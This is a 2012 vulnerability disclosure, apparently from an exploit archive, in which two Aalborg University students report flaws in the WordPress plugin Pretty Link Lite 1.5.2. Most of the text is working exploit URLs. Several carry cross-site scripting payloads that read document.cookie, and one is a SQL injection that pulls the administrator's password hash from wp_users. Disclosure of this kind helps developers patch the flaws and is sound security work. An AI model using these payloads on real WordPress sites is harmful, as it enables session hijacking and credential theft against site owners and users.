Home / exploitsPDF  

WordPress Pretty Link Lite 1.5.2 Cross Site Scripting

Posted on 15 May 2012

Hi We have used our tool, THAPS, to identify vulnerabilities in this WordPress plugin. We have confirmed at least one of the reported vulnerabilities and created a working exploit located below. Attached is one or more log files containing the output of our tool, identifying the location of the vulnerabilities which might help the developers locate the issue. Module: Pretty Link Lite Version: 1.5.2 Confirmed exploits: Exploit: http://wp.bacon/wp-content/plugins/pretty-link/pretty-bar.php?url="><script>alert(document.cookie);</script> Exploit: The key is automatically generated, but can be found using other vulnerabilities in this module http://wp.bacon/wp-content/plugins/pretty-link/prli-bookmarklet.php?k=c69dbe5f453820a32b0d0b0bb2098d3d&target_url=%23"><script>alert(document.cookie);</script><a name=" Exploit: http://wp.bacon/wp-admin/admin.php?page=pretty-link/prli-clicks.php&action=csv&l=1%20and%201=0%20UNION%20SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID=1 Exploit: http://wp.bacon/wp-admin/admin.php?page=pretty-link/prli-groups.php&action=new POST data: name="><script>alert(document.cookie);</script> Best Regards Heine Pedersen and Torben Jensen Student project group: sw101f12 Aalborg University Denmark

 

TOP